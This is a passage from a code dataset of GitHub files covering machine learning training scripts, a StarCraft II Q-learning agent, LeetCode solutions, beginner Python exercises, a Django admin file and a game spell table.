save_embedding(self, file_name, id2word):\n embeds = self.u_embeddings.weight.data\n fo = open(file_name, 'w')\n for idx in range(len(embeds)):\n word = id2word(idx)\n embed = ' '.join(embeds[idx])\n fo.write(word + ' ' + embed + '\\n')\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_fanglanting_skip_gram_pytorch.py","file_name":"test_fanglanting_skip_gram_pytorch.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"37623600731","text":"import logging\nimport sys, os\nimport argparse\nimport random\n\nimport pandas as pd\nimport torch\nfrom vsc.baseline.model_factory.utils import build_dataset\nimport torch.nn.functional as F\nfrom video.model import MD\nimport torch.distributed as dist\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom mmcv import Config\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nimport torchsnooper\nimport torch.nn as nn\nfrom video.comm import all_gather as comm_gather\nfrom sklearn.metrics import average_precision_score\nfrom tqdm import tqdm\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', type=str, default=\"\")\n parser.add_argument('--batch_size', type=int, default=64)\n parser.add_argument('--num_workers', type=int, default=8)\n parser.add_argument('--feat_dim', type=int, default=1024)\n parser.add_argument('--bert_dim', type=int, default=768)\n parser.add_argument('--output_dim', type=int, default=256)\n parser.add_argument('--bert_path', type=str, default=\"\")\n parser.add_argument('--val_ann_path', type=str, default=\"\")\n parser.add_argument('--max_frames', type=int, default=256)\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--t', type=float, default=0.05)\n parser.add_argument('--margin', type=float, default=0.5)\n parser.add_argument('--positive_ratio', type=float, default=0.1)\n parser.add_argument('--print_freq', type=int, default=50)\n parser.add_argument('--eval_freq', type=int, default=50)\n parser.add_argument('--work_dir', type=str, default='')\n parser.add_argument('--resume', type=str, default='')\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--warmup_ratio', type=float, default=0.1)\n parser.add_argument('--clip_grad_norm', type=float, default=1)\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--fp16', action='store_true', default=False)\n parser.add_argument('--gradient_checkpointing', action='store_true', default=False)\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\n\nwork_dir = args.work_dir\nbatch_size = args.batch_size\nlr = args.lr\nepochs = args.epochs\nprint_freq = args.print_freq\nresume = args.resume if args.resume != '' else None\nwarmup_ratio = args.warmup_ratio\n\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n\nsetup_seed(1234)\n\n\ndef all_gather(local_rank, world_size, **tensors):\n tensors = list(tensors.values())\n _dims = [t.shape[-1] for t in tensors]\n tensors = torch.cat(tensors, dim=-1)\n tensors_all = [torch.zeros_like(tensors) for _ in range(world_size)]\n dist.all_gather(tensors_all, tensors)\n tensors_all[local_rank] = tensors\n tensors_all = torch.cat(tensors_all, dim=0)\n\n results = list()\n dimStart = 0\n assert sum(_dims) == tensors_all.shape[-1]\n for d in _dims:\n results.append(tensors_all[..., dimStart: dimStart + d])\n dimStart += d\n\n return tuple(results)\n\n\nworld_size = int(os.environ['WORLD_SIZE'])\ntorch.cuda.set_device(args.local_rank)\ndist.init_process_group(backend='nccl', init_method='env://', rank=args.local_rank, world_size=world_size)\n\nif args.local_rank == 0:\n os.system(\"mkdir -p %s\" % work_dir)\n os.system(\"mkdir -p %s/checkpoints\" % work_dir)\n logger = logging.getLogger('log')\n logger.setLevel(logging.INFO)\n\n ch = logging.StreamHandler(stream=sys.stdout)\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter(\"[%(levelname)s: %(asctime)s] %(message)s\")\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n fh = logging.FileHandler(work_dir + '/log.txt')\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ncfg = Config.fromfile(args.config)\ncfg.local_rank = args.local_rank\n\ntrain_dataset = build_dataset(cfg.data.train)\ntrain_dataset.positive_ratio = args.positive_ratio\ntrain_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, num_workers=args.num_workers, sampler=train_sampler)\n\nval_dataset = build_dataset(cfg.data.val)\nval_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, drop_last=False, shuffle=False)\nval_loader = DataLoader(val_dataset, batch_size=batch_size, num_workers=args.num_workers, sampler=val_sampler)\n\nmodel = MD(args)\nmodel.cuda(args.local_rank)\n\n\nopt = AdamW(model.parameters(), lr=lr)\nbatch_size = batch_size * world_size\nstepsize = (len(train_dataset) // batch_size + 1)\ntotal_steps = (len(train_dataset) // batch_size + 1) * epochs\nscheduler = get_linear_schedule_with_warmup(opt, num_warmup_steps=warmup_ratio * total_steps,\n num_training_steps=total_steps)\n\nmodel = DDP(model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True)\nscaler = torch.cuda.amp.GradScaler()\n\nstart_epoch = 0\nckpt = None\nif resume:\n ckpt = torch.load(resume, map_location='cpu')\nelif os.path.exists(work_dir + '/last.txt'):\n f = open(work_dir + '/last.txt')\n e = int(f.readline())\n f.close()\n ckpt = torch.load(work_dir + '/checkpoints/epoch_%d.pth' % e, map_location='cpu')\nif ckpt is not None:\n model.load_state_dict(ckpt['state_dict'])\n opt.load_state_dict(ckpt['optimizer'])\n scheduler.load_state_dict(ckpt['scheduler'])\n start_epoch = ckpt['epoch'] + 1\n del ckpt\n\n\ndef train_step(batch_data):\n # vid_a, vid_b = batch_data[\"vid_a\"], batch_data[\"vid_b\"]\n labels = batch_data[\"labels\"]\n cat_x = torch.cat([batch_data[\"frames_a\"], batch_data[\"frames_b\"]], dim=0)\n bz = batch_data[\"frames_a\"].size(0)\n embeds = model(cat_x)\n embeds = embeds / embeds.norm(dim=1, keepdim=True)\n\n emb_a, emb_b = embeds[:bz], embeds[bz:]\n\n # loss_ = F.cosine_embedding_loss(emb_a, emb_b, labels, margin=args.margin)\n loss_ = F.binary_cross_entropy_with_logits(F.cosine_similarity(emb_a, emb_b, dim=1) / 0.12, labels.float())\n\n emb_a, emb_b, labels = all_gather(args.local_rank, world_size, emb_a=emb_a, emb_b=emb_b, labels=labels[:, None])\n labels = labels.squeeze(1)\n\n sims = emb_a @ emb_b.t()\n gt = torch.arange(sims.size(0)).to(sims.device)\n vcv_loss_ = F.cross_entropy(sims / 0.07, gt, reduction=\"none\")[labels.gt(0)].mean()\n loss_ = vcv_loss_ + loss_\n\n scores_ = F.cosine_similarity(emb_a, emb_b, dim=1).detach().cpu().numpy()\n labels_ = labels.int().detach().cpu().numpy()\n pn_ = (labels_ == 1).sum() / labels_.shape[0]\n ap_ = average_precision_score(labels_, scores_)\n\n return loss_, ap_, pn_\n\n\nglobal_step = 0\nfor e in range(start_epoch, epochs):\n model.train()\n train_sampler.set_epoch(e)\n for b, batch in enumerate(train_loader):\n\n for _k, _v in batch.items():\n if isinstance(_v, torch.Tensor):\n batch[_k] = _v.cuda(args.local_rank)\n\n opt.zero_grad()\n if args.fp16:\n with torch.cuda.amp.autocast():\n loss, ap, pn = train_step(batch)\n scaler.scale(loss).backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad_norm)\n scaler.step(opt)\n scaler.update()\n else:\n loss, ap, pn = train_step(batch)\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad_norm)\n opt.step()\n scheduler.step()\n global_step += 1\n\n if args.local_rank == 0 and b % print_freq == 0:\n logger.info('Epoch %d Batch %d Loss %.3f, AP %.3f, PN %.3f' % (e, b, loss.item(), ap, pn))\n\n if b > 0 and b % args.eval_freq == 0:\n # eval\n model.eval()\n vid2embedding = dict()\n\n with torch.no_grad(), torch.cuda.amp.autocast():\n for val_batch in val_loader:\n vids_ = []\n for vid_list in comm_gather(val_batch[\"vid\"]):\n vids_.extend(vid_list)\n\n val_embeds = model(val_batch[\"frames\"].cuda(args.local_rank))\n val_embeds = val_embeds / val_embeds.norm(dim=1, keepdim=True)\n tensors_temp = [torch.zeros_like(val_embeds) for _ in range(world_size)]\n dist.all_gather(tensors_temp, val_embeds)\n\n val_embeds = torch.cat(tensors_temp, dim=0).detach().cpu().numpy()\n\n for idx, emb in zip(vids_, val_embeds):\n vid2embedding[idx] = emb\n\n # do eval\n q_embeds = []\n r_embeds = []\n q_vids = []\n r_vids = []\n for idx, emb in vid2embedding.items():\n if idx.startswith(\"Q\"):\n q_embeds.append(emb)\n q_vids.append(idx)\n else:\n r_embeds.append(emb)\n r_vids.append(idx)\n\n with torch.no_grad():\n q_embeds = torch.tensor(np.array([x.tolist() for x in q_embeds]))\n r_embeds = torch.tensor(np.array([x.tolist() for x in r_embeds]))\n scores = q_embeds @ r_embeds.t() # q, (r1 + r2)\n scores = scores.detach().cpu().numpy()\n\n max_k = 1200\n norm_k = 1\n r1_scores = []\n r2_scores = []\n r1_vids = []\n for j, idx in enumerate(r_vids):\n if idx.startswith(\"R1\"):\n r1_scores.append(scores[:, j])\n r1_vids.append(idx)\n else:\n r2_scores.append(scores[:, j])\n\n r1_scores = np.stack(r1_scores, axis=1) # q, r1\n r2_scores = np.stack(r2_scores, axis=1) # q, r1\n\n if args.local_rank == 0:\n print(\"#####R1 Shape\", r1_scores.shape)\n print(\"#####R2 Shape\", r2_scores.shape)\n\n bias = np.sort(r2_scores, axis=1)[:, -norm_k:].mean(axis=1, keepdims=True) # q, 1\n # norm_scores = r1_scores - bias\n norm_scores = r1_scores\n top_k_scores = np.sort(norm_scores, axis=1)[:, -max_k:] # q, k\n top_k_index = np.argsort(norm_scores, axis=1)[:, -max_k:] # q, k\n\n val_ann = set()\n with open(args.val_ann_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n id1, id2 = line.strip().split(\",\")\n val_ann.add((id1, id2))\n\n pair_query = []\n pair_ref = []\n pair_scores = []\n pair_labels = []\n for r in range(top_k_scores.shape[0]):\n for c in range(top_k_scores.shape[1]):\n k = top_k_index[r, c]\n pair_scores.append(top_k_scores[r, c])\n pair_query.append(q_vids[r])\n pair_ref.append(r1_vids[k])\n if (q_vids[r], r1_vids[k]) in val_ann:\n pair_labels.append(1)\n else:\n pair_labels.append(0)\n\n pair_scores = np.array(pair_scores)\n pair_labels = np.array(pair_labels)\n\n result_df = pd.DataFrame()\n result_df[\"scores\"] = pair_scores\n result_df[\"query\"] = pair_query\n result_df[\"ref\"] = pair_ref\n result_df[\"labels\"] = pair_labels\n\n val_ap = average_precision_score(pair_labels, pair_scores)\n\n if args.local_rank == 0:\n print(\"*** Epoch %d Batch %d VAL AP %.3f\" % (e, b, val_ap))\n logger.info(\"*** Epoch %d Batch %d VAL AP %.3f\" % (e, b, val_ap))\n result_df.to_csv(f\"{args.work_dir}/result_step{global_step}.csv\", index=False)\n\n ckpt = {'state_dict': model.state_dict(), 'optimizer': opt.state_dict(), 'scheduler': scheduler.state_dict(),\n 'epoch': e}\n torch.save(ckpt, work_dir + '/checkpoints/epoch_%d_step_%d.pth' % (e, global_step))\n model.train()\n","repo_name":"FeipengMa6/VSC22-Submission","sub_path":"VSC22-Descriptor-Track-1st/train/train_vid_score/video_descriptor_train.py","file_name":"video_descriptor_train.py","file_ext":"py","file_size_in_byte":12206,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"71"}
+{"seq_id":"25035175631","text":"# https://leetcode.com/problems/partition-labels/\nfrom typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]:\n index = defaultdict(lambda: (float(\"inf\"), float(\"-inf\")))\n for idx, letter in enumerate(s):\n index[letter] = (\n min(idx, index[letter][0]),\n max(idx, index[letter][1]),\n )\n partitions = []\n start, end = float(\"inf\"), float(\"-inf\")\n for idx, letter in enumerate(s):\n start, end = min(start, index[letter][0]), max(\n end, index[letter][1]\n )\n if idx == end:\n partitions.append(end - start + 1)\n start, end = float(\"inf\"), float(\"-inf\")\n return partitions\n\n\nif __name__ == \"__main__\":\n print(Solution().partitionLabels(\"\"))\n","repo_name":"mainden7/leetcode_problems","sub_path":"0.data_structures/4.strings/partition_labels.py","file_name":"partition_labels.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37259323619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 6 15:52:48 2019\n\n@author: yifeng\n\"\"\"\n\n# 题目详解参考\n# https://blog.csdn.net/weixin_42001089/article/details/84203651\n\nclass Solution:\n def largestRectangleArea(self,heights):\n heights.append(0)\n stack = []\n i = 0\n result = 0\n while i= 18:\n# print('adult')\n# elif int(age) >= 6:\n# print('teenager')\n# else:\n# print('kid')\n\n\n# BMI calculator\n\nsystem = input('What system are you using (M for metric, US for customary): ')\nweight = int(input('What is your weight: '))\nheight = int(input('What is your height: '))\n\ndef bmi_calculator(system, weight, height):\n bmi = (weight / (height ** 2))\n if system == 'US':\n bmi = bmi * 703\n if bmi < 18.5:\n return bmi, 'underweight'\n elif 18.5 <= bmi < 25:\n return bmi, 'normal weight'\n elif 25 <= bmi < 30:\n return bmi, 'overweight'\n else:\n return bmi, 'obese'\n\nbmi, status = bmi_calculator(system, weight, height)\nprint(f'Your bmi is {bmi} and you are {status}.')\n\n\ndef compare(a, b):\n if isinstance(a, str) or isinstance(b, str):\n return 'string involved'\n else:\n if a > b:\n return 'bigger'\n elif a == b:\n return 'equal'\n else:\n return 'smaller'\n\na = 'hello'\nb = 3\nc = 5\n\nprint(compare(a, b))\nprint(compare(b, c))\n\n\ndef cigar_party(cigars, is_weekend):\n return is_weekend and cigars >= 40 or 40 <= cigars <= 60\n","repo_name":"KyleLawson16/mis3640","sub_path":"session06/if-demo.py","file_name":"if-demo.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24218747178","text":"# python -m pysc2.bin.agent \\ --map Simple64 \\ --agent attack_agent.SparseAgent \\ --agent_race T \\ --max_agent_steps 0 \\ --norender\n# Code segments used from: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow\n\nimport random\nimport math\nimport os.path\n\nimport numpy as np\nimport pandas as pd\n\nfrom pysc2.agents import base_agent\nfrom pysc2.lib import actions\nfrom pysc2.lib import features\n\n_NO_OP = actions.FUNCTIONS.no_op.id\n_SELECT_POINT = actions.FUNCTIONS.select_point.id\n_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id\n_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id\n_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id\n_SELECT_ARMY = actions.FUNCTIONS.select_army.id\n_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id\n_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id\n\n_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index\n_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index\n_PLAYER_ID = features.SCREEN_FEATURES.player_id.index\n\n_PLAYER_SELF = 1\n_PLAYER_HOSTILE = 4\n_ARMY_SUPPLY = 5\n\n_TERRAN_COMMANDCENTER = 18\n_TERRAN_SCV = 45\n_TERRAN_SUPPLY_DEPOT = 19\n_TERRAN_BARRACKS = 21\n_NEUTRAL_MINERAL_FIELD = 341\n\n_NOT_QUEUED = [0]\n_QUEUED = [1]\n_SELECT_ALL = [2] # Allows the selecting of all units of a certain type\n\nDATA_FILE = 'sparse_agent_data' # Used for storing the Q-Table\n\nACTION_DO_NOTHING = 'donothing'\nACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'\nACTION_BUILD_BARRACKS = 'buildbarracks'\nACTION_BUILD_MARINE = 'buildmarine'\nACTION_ATTACK = 'attack'\n\nsmart_actions = [\n ACTION_DO_NOTHING,\n ACTION_BUILD_SUPPLY_DEPOT,\n ACTION_BUILD_BARRACKS,\n ACTION_BUILD_MARINE,\n]\n\n# Since we are using the minimap we would have a 64x64 grid\nfor mm_x in range(0, 64):\n for mm_y in range(0, 64):\n if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:\n # Create every possible attack position. Will look like: \"attack_5_10\"\n smart_actions.append(ACTION_ATTACK + '_' +\n str(mm_x - 16) + '_' + str(mm_y - 16)) # Subtract 16 bec we want to select the top left corner of grid\n\n\n\nclass QLearningTable:\n def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):\n self.actions = actions # list of int\n self.lr = learning_rate\n self.gamma = reward_decay\n self.epsilon = e_greedy\n self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)\n\n def choose_action(self, observation):\n self.check_state_exist(observation)\n\n # Uses epsilon greedy exploration to find the next action\n if np.random.uniform() < self.epsilon:\n # choose best action\n state_action = self.q_table.ix[observation, :]\n\n # some actions have the same value\n state_action = state_action.reindex(np.random.permutation(state_action.index))\n\n action = state_action.idxmax() # Return max value\n else:\n # choose random action\n action = np.random.choice(self.actions)\n\n return action\n\n def learn(self, s, a, r, next_s):\n self.check_state_exist(next_s)\n self.check_state_exist(s)\n\n q_predict = self.q_table.ix[s, a]\n\n if next_s != 'terminal': # Not terminal meaning it does not end the game, then apply a reward\n # From next state check all actions and take the max value\n q_target = r + self.gamma * self.q_table.ix[next_s, :].max() #NEEDS TO BE UPDATED TO USE \"TD ERROR\"\n else:\n q_target = r # next state is terminal, dont apply reward\n\n # update\n self.q_table.ix[s, a] += self.lr * (q_target - q_predict)\n\n # Check the state exists if not we add it to the table. Makes the agent dynamically learn new states\n def check_state_exist(self, state):\n if state not in self.q_table.index:\n # append new state to q table\n self.q_table = self.q_table.append(pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state)) # [0] * len(actions) creates an array with 8 zeros in it\n\n\nclass SparseAgent(base_agent.BaseAgent):\n def __init__(self):\n super(SparseAgent, self).__init__()\n\n self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))\n\n self.previous_action = None\n self.previous_state = None\n\n # Command Center location\n self.cc_y = None\n self.cc_x = None\n\n # Since it is using multistep actions, we keep track of it using move_number\n self.move_number = 0\n\n if os.path.isfile(DATA_FILE + '.gz'):\n self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')\n\n # Used for the case when base is at bottom right\n def transformDistance(self, x, x_distance, y, y_distance):\n if not self.base_top_left:\n return [x - x_distance, y - y_distance]\n\n return [x + x_distance, y + y_distance]\n\n # Used for the case when base is at bottom right\n def transformLocation(self, x, y):\n if not self.base_top_left:\n return [64 - x, 64 - y]\n\n return [x, y]\n\n # Get the action and location\n def splitAction(self, action_id):\n smart_action = smart_actions[action_id]\n\n x = 0\n y = 0\n if '_' in smart_action:\n smart_action, x, y = smart_action.split('_')\n\n return (smart_action, x, y)\n\n def step(self, obs):\n super(SparseAgent, self).step(obs)\n\n # Checks that game has ended if so then get final reward\n if obs.last():\n reward = obs.reward # Returned by the game: 1 if win, -1 for loss and 0 for tie (reached at 28000 steps defualt)\n\n self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')\n\n self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')\n\n self.previous_action = None\n self.previous_state = None\n\n self.move_number = 0\n\n return actions.FunctionCall(_NO_OP, [])\n\n unit_type = obs.observation['screen'][_UNIT_TYPE]\n\n # Checks if its the first step of the game then create required items\n if obs.first():\n # Player y and x are a list of the agents units in pixels covered by the unit\n player_y, player_x = (obs.observation['minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()\n\n # Take from list the mean value and check position. If mean is greater than 31 chances are the units are on bottom right\n self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0\n\n self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()\n\n cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()\n cc_count = 1 if cc_y.any() else 0\n\n # We need to count how many of each we have. In this case we get the length of the pixels covered by the unit and divide by its pixel size\n depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()\n supply_depot_count = int(round(len(depot_y) / 69)) # Divide by the number of pixels a depot usually covers \"69\" in this case\n\n barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()\n barracks_count = int(round(len(barracks_y) / 137)) # Divide by the number of pixels a command center usually takes \"137\" in this case\n\n\n if self.move_number == 0:\n self.move_number += 1\n\n # Define running stats of the player. This is the state of of the game for the agent\n current_state = np.zeros(8)\n current_state[0] = cc_count # Number of command centers\n current_state[1] = supply_depot_count # Number of supply depots\n current_state[2] = barracks_count # Number of barracks\n current_state[3] = obs.observation['player'][_ARMY_SUPPLY] # Army supply \n\n # Hot squares defines location where enemies are. We divide map into 4 quadrants and mark each with 1 if enemy found\n hot_squares = np.zeros(4)\n # Get a list of hostile units locations\n enemy_y, enemy_x = (obs.observation['minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()\n\n for i in range(0, len(enemy_y)):\n y = int(math.ceil((enemy_y[i] + 1) / 32))\n x = int(math.ceil((enemy_x[i] + 1) / 32))\n\n hot_squares[((y - 1) * 2) + (x - 1)] = 1\n\n if not self.base_top_left:\n hot_squares = hot_squares[::-1]\n\n for i in range(0, 4):\n current_state[i + 4] = hot_squares[i]\n\n # Start by checking if first step than we learn\n if self.previous_action is not None:\n self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))\n\n # Get action to do\n rl_action = self.qlearn.choose_action(str(current_state))\n\n self.previous_state = current_state\n self.previous_action = rl_action\n\n smart_action, x, y = self.splitAction(self.previous_action)\n\n \"\"\" All actions will be 3 game steps: \n - The selection of a unit\n - The action to take\n - A follow up action\n \"\"\"\n\n # Build Barracks\n if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero() # Get list of scv units\n\n if unit_y.any():\n i = random.randint(0, len(unit_y) - 1)\n target = [unit_x[i], unit_y[i]] # Pick a random one\n\n return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target]) # Select the unit\n \n # Build Marine\n elif smart_action == ACTION_BUILD_MARINE:\n if barracks_y.any():\n i = random.randint(0, len(barracks_y) - 1)\n target = [barracks_x[i], barracks_y[i]]\n\n return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target]) # Use select all to choose all barracks. The game auto chooses empty barracks to build units in to balance workload\n \n # Select the army\n elif smart_action == ACTION_ATTACK:\n if _SELECT_ARMY in obs.observation['available_actions']:\n return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])\n\n # Increment into next move stage\n elif self.move_number == 1:\n self.move_number += 1\n\n smart_action, x, y = self.splitAction(self.previous_action) # Get next move\n\n # Build Supply Depot\n if smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']: # We want to build 2 depots\n if self.cc_y.any():\n if supply_depot_count == 0:\n # Build them in fixed locations\n target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)\n elif supply_depot_count == 1:\n target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)\n\n return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])\n\n # Build Barracks\n elif smart_action == ACTION_BUILD_BARRACKS:\n if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']: # Build only 2\n if self.cc_y.any():\n # Build them in fixed locations\n if barracks_count == 0:\n target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9) \n elif barracks_count == 1:\n target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)\n\n return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])\n \n # Build Marine\n elif smart_action == ACTION_BUILD_MARINE:\n if _TRAIN_MARINE in obs.observation['available_actions']:\n return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])\n\n # Attack with marines\n elif smart_action == ACTION_ATTACK:\n do_it = True\n\n # Make sure no SCV selected\n if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:\n do_it = False\n # Make sure no SCV selected with army\n if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:\n do_it = False\n\n # Find random quad to attack. REMEMBER that attacking a point attacks 4 surrounding quads. So we choose the center of a quad and this will attack surrounding area\n if do_it and _ATTACK_MINIMAP in obs.observation[\"available_actions\"]:\n x_offset = random.randint(-1, 1)\n y_offset = random.randint(-1, 1)\n\n return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED, self.transformLocation(int(x) + (x_offset * 8), int(y) + (y_offset * 8))])\n\n # Increment mover counter. We know ensure SCV goes back to work after building \n elif self.move_number == 2:\n self.move_number = 0\n\n smart_action, x, y = self.splitAction(self.previous_action)\n\n # We check that we had sent an SCV to do the building\n if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:\n # Check it can harvest\n if _HARVEST_GATHER in obs.observation['available_actions']:\n unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()\n\n if unit_y.any():\n i = random.randint(0, len(unit_y) - 1)\n\n # Get random harvest location\n m_x = unit_x[i]\n m_y = unit_y[i]\n\n target = [int(m_x), int(m_y)]\n\n return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target]) # Send SCV to harvest. NOTICE it is queued so SCV will finish building first\n\n return actions.FunctionCall(_NO_OP, [])\n\n","repo_name":"chrisjl154/meng_project","sub_path":"agent_code/attack_agent.py","file_name":"attack_agent.py","file_ext":"py","file_size_in_byte":14685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"72879089191","text":"'''\r\nCreated on 2018/10/28\r\n\r\n@author: onohdn\r\n\r\n演習問題\r\n入力した数値に対して、4の倍数であるかを判定するプログラムを作成しなさい。\r\n\r\n期待結果\r\n数値を入力してください->8\r\n4の倍数です\r\n\r\n数値を入力してください->9\r\n4の倍数ではありません\r\n\r\n'''\r\n\r\ntry:\r\n x = int(input(\"数値を入力してください->\"))\r\n\r\n if x%4 == 0:\r\n print(\"4の倍数です\")\r\n else:\r\n print(\"4の倍数ではありません\")\r\n\r\nexcept ValueError:\r\n\r\n print(\"数値を入力してください\")\r\n","repo_name":"onohdn/MyPythonRepository","sub_path":"practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11707514142","text":"from django.contrib import admin\nfrom import_export.admin import ImportExportModelAdmin\n\n# Register your models here.\nfrom apps.data.models import DailyData, Instrument\n\n\n@admin.register(Instrument)\nclass Instrument(admin.ModelAdmin):\n list_display = (\n \"ticker\",\n )\n list_filter = (\n \"ticker\",\n )\n\n@admin.register(DailyData)\nclass DailyData(ImportExportModelAdmin, admin.ModelAdmin):\n list_display = (\n \"instrument\",\n \"date\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"volume\",\n )\n list_filter = (\n \"instrument__ticker\",\n )\n","repo_name":"webclinic017/trading_deploy","sub_path":"apps/data/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22575184078","text":"\"\"\"Define the Shaman Class its Specs and Spells.\"\"\"\r\n# pylint: disable=line-too-long\r\n# pylint: disable=bad-whitespace\r\n# pylint: disable=wildcard-import\r\n# pylint: disable=unused-wildcard-import\r\n# fmt: off\r\n\r\n# IMPORT LOCAL LIBRARIES\r\nfrom lorgs.data.constants import *\r\nfrom lorgs.data.roles import *\r\nfrom lorgs.models import warcraftlogs_actor\r\nfrom lorgs.models.wow_class import WowClass\r\nfrom lorgs.models.wow_spec import WowSpec\r\nfrom lorgs.models.wow_spell import SpellTag, SpellType\r\n\r\n\r\n################################################################################\r\n# Class\r\n#\r\nSHAMAN = WowClass(id=7, name=\"Shaman\", color=\"#0070DD\")\r\n\r\n################################################################################\r\n# Specs\r\n#\r\nSHAMAN_ELEMENTAL = WowSpec(role=RDPS, wow_class=SHAMAN, name=\"Elemental\")\r\nSHAMAN_ENHANCEMENT = WowSpec(role=MDPS, wow_class=SHAMAN, name=\"Enhancement\")\r\nSHAMAN_RESTORATION = WowSpec(role=HEAL, wow_class=SHAMAN, name=\"Restoration\", short_name=\"Resto\")\r\n\r\n################################################################################\r\n# Spells\r\n#\r\n# SHAMAN.add_spell( spell_id=320674, cooldown=90, color=COL_VENTR, name=\"Chain Harvest\", icon=\"ability_revendreth_shaman.jpg\", show=False)\r\n# SHAMAN.add_spell( spell_id=328923, cooldown=120, duration=3, color=COL_NF, name=\"Fae Transfusion\", icon=\"ability_ardenweald_shaman.jpg\", show=True)\r\nSHAMAN.add_spell( spell_id=375982, cooldown=45, color=COL_NECRO, name=\"Primordial Wave\", icon=\"ability_maldraxxus_shaman.jpg\", show=False)\r\n\r\n# Utils\r\nSHAMAN.add_spell( spell_id=108281, cooldown=120, duration=10, name=\"Ancestral Guidance\", 